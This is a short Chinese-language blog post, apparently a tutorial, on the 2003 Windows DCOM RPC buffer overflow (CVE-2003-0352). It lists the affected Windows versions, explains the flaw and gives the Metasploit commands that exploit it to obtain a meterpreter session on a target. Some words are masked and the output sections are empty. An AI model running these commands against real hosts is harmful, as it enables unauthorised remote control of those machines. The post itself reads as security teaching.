此漏洞由lds-pl.net漏洞研究組在2003年7月16日發現,漏洞及exp在網上公開後,網上出現了大量的×××實例,利用此漏洞的蠕蟲也大量出現。
CVE-2003-0352
Microsoft Windows XP Professional SP1 Microsoft Windows XP Professional Microsoft Windows XP Home SP1 Microsoft Windows XP Home Microsoft Windows XP Microsoft Windows NT 4.0SP6a Microsoft Windows NT 4.0SP6 Microsoft Windows NT 4.0SP5 Microsoft Windows NT 4.0SP4 Microsoft Windows NT 4.0SP3 Microsoft Windows NT 4.0SP2 Microsoft Windows NT 4.0SP1 Microsoft Windows NT 4.0 Microsoft Windows 2003 Microsoft Windows 2000SP3 Microsoft Windows 2000SP2 Microsoft Windows 2000SP1 Microsoft Windows 2000
使用DCOM接口的Windows RPC 服務器
微軟修改dcerpc框架後造成本身的RPC框架來處理進程間的通訊。微軟的RPC框架在處理TCP/IP信息交換過程當中存在的畸形消息時,未正確處理,致使緩衝區溢出漏洞;此漏洞影響使用RPC框架的DCOM接口,DCOM接口用來處理客戶端機器發送給服務器的DCOM對象激活請求,如UNC路徑。
Windows NT SP3-6a Windows 2000 Windows XP Windows 2003 Universal
use exploit/windows/dcerpc/ms03_026_dcom set rhost <target ip> run -j # 後臺運行××× # 若是×××成功,將會直接返回meterpreter會話,不然,×××失敗。
×××成功:
×××失敗:html
UNC路徑:Universal Naming Convention,通用命名規則;UNC路徑爲目錄的網絡路徑,如:\\10.129.10.1\c$\
tomqq_cu 博客windows